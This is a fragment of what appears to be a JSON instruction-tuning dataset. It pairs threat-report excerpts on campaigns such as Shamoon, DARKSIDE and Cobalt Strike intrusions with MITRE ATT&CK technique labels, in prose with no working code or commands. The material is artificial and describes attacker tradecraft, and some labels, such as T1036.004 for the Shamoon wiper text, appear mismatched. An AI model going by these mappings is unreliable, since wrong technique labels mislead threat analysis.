attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In addition to the use of\u00a0common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP\u00a0and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot\u2019s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\[3 characters]\\[1 character]. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry Run and execute ordinal #1 of the DLL", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\"\\system32\\csrss.exe\"\", which allows it to determine if it can write its payload to the \"\"\\system32\"\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word \u201cshinu\u201d used as a parameter could be a reference to the Arabic slang for the word \u201cwhat\u201d, as well as a reference to a village name in northwestern Iran. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective\"", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, the payloads were almost never repeated. The threat actor made sure that each payload had a unique hash, and some payloads were packed using different types of packers, both known and custom", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. UNC2465 also uses the publicly available NGROK utility to bypass firewalls and expose remote desktop service ports, like RDP and WinRM, to the open internet. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The execution of the Powershell that is passed to IEX by the Stage 1 Word document is where we begin to observe several interesting activities occurring on an infected system. One is used to determine whether or not to achieve persistence for the next stage of the infection process on the target system. If persistence is selected the other switch defines whether or not the Stage 3 code should be executed once it is staged. If the option to achieve persistence was selected when the 'pre_logic' function was called, the function will then query the infected system to determine how to best achieve persistence. Depending on the access rights of the user account within which the malware is operating, the malware will then query registry paths that are commonly used by malware to achieve persistence. If operating under an account with Administrator access to the system the script will query and set", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At the beginning of 2017, Silent Librarian began to regularly obtain free Let\u2019s Encrypt SSL certificates for their phishing pages. This technique, which we have previous discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages", + "output": "- T1588.004: Obtain Capabilities - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The HTTP mode is the same communication method used in variants of the malware from 2018. Although it uses the non-encrypted HTTP protocol to communicate with the C2 it manually encrypts the contents of the requests to hide data from packet inspection. The malware creates an AES session key and initial value (as detailed in Appendix C) which are base64 encoded, appended to each other with a \\n separator. Once appended, it is further encrypted with a hardcoded RSA public key and base64 encoded again and obfuscated before being sent to the C2 as the body of a POST request", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The REvil (also known as Sodinokibi) ransomware was first identified on April 17, 2019. It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. Secureworks\u00ae Counter Threat Unit\u2122 (CTU) analysis suggests that REvil is likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KernelCallbackTable is initialized to an array of callback functions when user32.dll is loaded into memory, which are used whenever a graphical call (GDI) is made by the process. To hijack the control flow, malware replaces the USER32. _fnDWORD callback in the table with the malicious WMIsAvailableOffline function. Once the flow is hijacked and malicious code is executed the rest of the code takes care of restoring the KernelCallbackTable to its original state", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Apart from being a flexible and easy-to-use scripting language, BLADABINDI\u2019s use of AutoIt is notable. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which can make the payload \u2014 the backdoor \u2014 difficult to detect", + "output": "- T1027.004: Obfuscated Files or Information - Compile After Delivery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In an uninhibited Emotet infection, it\u2019s likely the malware would have then attempted to move laterally to other machines in the environment. Malwarebytes has some\u00a0good analyses of Emotet\u00a0if you\u2019re looking for further reading", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "infpub.dat appears to be capable of brute-forcing NTLM login credentials to Windows machines that have pseudo-random IP addresses", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The code of this module is loaded directly into the exploited application and has several methods of payload execution. One of method uses a very interesting technique of payload execution which is designed mostly to bypass modern anti-malware products. This uses an interesting bug in the Windows DDE component. It is not a secret that anti-malware systems trigger on special system functions that are called in the context of potential vulnerable applications to make a deeper analysis of API calls such as CreateProcess, WinExec or ShellExecute", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "So attackers specify an external C&C server in the command line and the tool connects to this server using HTTP. This remote server is used as a proxy by attackers: the connection that goes to this server is redirected to the internal network by the tool and any response that the tool gets from a computer in the internal network goes to the C&C server. Thus, attackers can communicate with internal servers that are normally unreachable from the internet", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IronNetInjector is made of an IronPython script that contains a .NET injector and one or more payloads. The payloads can be also .NET assemblies (x86/64) or native PEs (x86/64). When an IronPython script is run, the .NET injector gets loaded, which in turn injects the payload(s) into its own or a remote process", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads\u00a0following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE\u00a0backdoor. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Each message contains an attachment that loads the payload \u2013 part of Cobalt Strike software \u2013 to the computer's operating memory. In order to make this download possible, attackers have tried several different formats of attachments and emails, as their primary task is to bypass mail filters, protection measures, and the company's security policy. 3 Example of a message with an executable attachment (.exe) The archive is password-protected in order to bypass anti-virus scans, security systems, and mail filters. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine\u2019s user is in the admin or domain admin group", + "output": "- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The injected payload is known as Cobalt Strike Beacon and can be used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files. The\u00a0Get-NetComputer\u00a0command from\u00a0PowerView\u00a0is renamed by the attackers to a random name", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis", + "output": "- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Microsoft has been monitoring these attacks and notifying targeted customers for several months, but only recently reached a point in our investigation where we can attribute the activity to Strontium with high confidence. MSTIC\u2019s investigation revealed that Strontium has evolved its tactics since the 2016 election to include new reconnaissance tools and new techniques to obfuscate their operations. In recent months, it has engaged in brute force attacks and password spray, two tactics that have likely allowed them to automate aspects of their operations. Strontium also disguised these credential harvesting attacks in new ways, running them through more than 1,000 constantly rotating IP addresses, many associated with the Tor anonymizing service. Strontium even evolved its infrastructure over time, adding and removing about 20 IPs per day to further mask its activity", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Apart from targeting Gmail users, Pawn Storm has also abused OAuth in credential phishing attacks against high profile Yahoo users. Here is an example from 2015 where \u201cMcAfee Email Protection\u201d is offered", + "output": "- T1528: Steal Application Access Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"ISMAgent prioritizes HTTP as its mechanism to communicate with the C2 server, but if it is unable to reach the C2 server it will switch to the DNS tunneling mechanism. To carry out its HTTP C2 communications, the Trojan prepends \"\"www. to the configured C2 domain and issues a DNS query to resolve this domain\"", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42\u2019s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus\u2019 use of the open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near-future", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To deliver the malware to the victim machines, the Rocke group exploits vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. For example, by exploiting Oracle WebLogic vulnerability CVE-2017-10271 in Linux shown in Figure 1, a compromised Linux victim machine downloads backdoor 0720.bin and opens a shell", + "output": "- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE 